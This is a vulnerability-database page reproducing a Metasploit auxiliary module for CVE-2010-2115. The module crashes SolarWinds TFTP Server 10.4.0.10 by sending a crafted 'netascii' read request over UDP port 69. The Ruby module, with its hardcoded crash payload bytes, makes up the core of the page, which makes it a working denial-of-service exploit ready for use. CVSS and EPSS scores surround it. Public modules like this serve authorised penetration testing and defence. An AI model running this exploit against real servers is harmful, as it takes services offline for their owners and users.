Lucene search

K
metasploitNullthreatMSF:AUXILIARY-DOS-WINDOWS-TFTP-SOLARWINDS-
HistoryJun 04, 2010 - 1:20 a.m.

SolarWinds TFTP Server 10.4.0.10 Denial of Service

2010-06-0401:20:19
Nullthreat
www.rapid7.com
7

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS

0.557

Percentile

97.7%

The SolarWinds TFTP server can be shut down by sending a ‘netascii’ read request with a specially crafted file name.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SolarWinds TFTP Server 10.4.0.10 Denial of Service' ,
      'Description'    => %q{
          The SolarWinds TFTP server can be shut down by sending a 'netascii' read
        request with a specially crafted file name.
      },
      'Author'         => 'Nullthreat',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2010-2115' ],
          [ 'OSVDB', '64845' ],
          [ 'EDB', '12683' ]
        ],
      'DisclosureDate' => '2010-05-21'))

    register_options([
      Opt::RPORT(69)
    ])
  end

  def run
    connect_udp
    print_status("Sending Crash request...")
    udp_sock.put("\x00\x01\x01\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00")
    disconnect_udp
  end
end

CVSS2

5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

EPSS

0.557

Percentile

97.7%

Related for MSF:AUXILIARY-DOS-WINDOWS-TFTP-SOLARWINDS-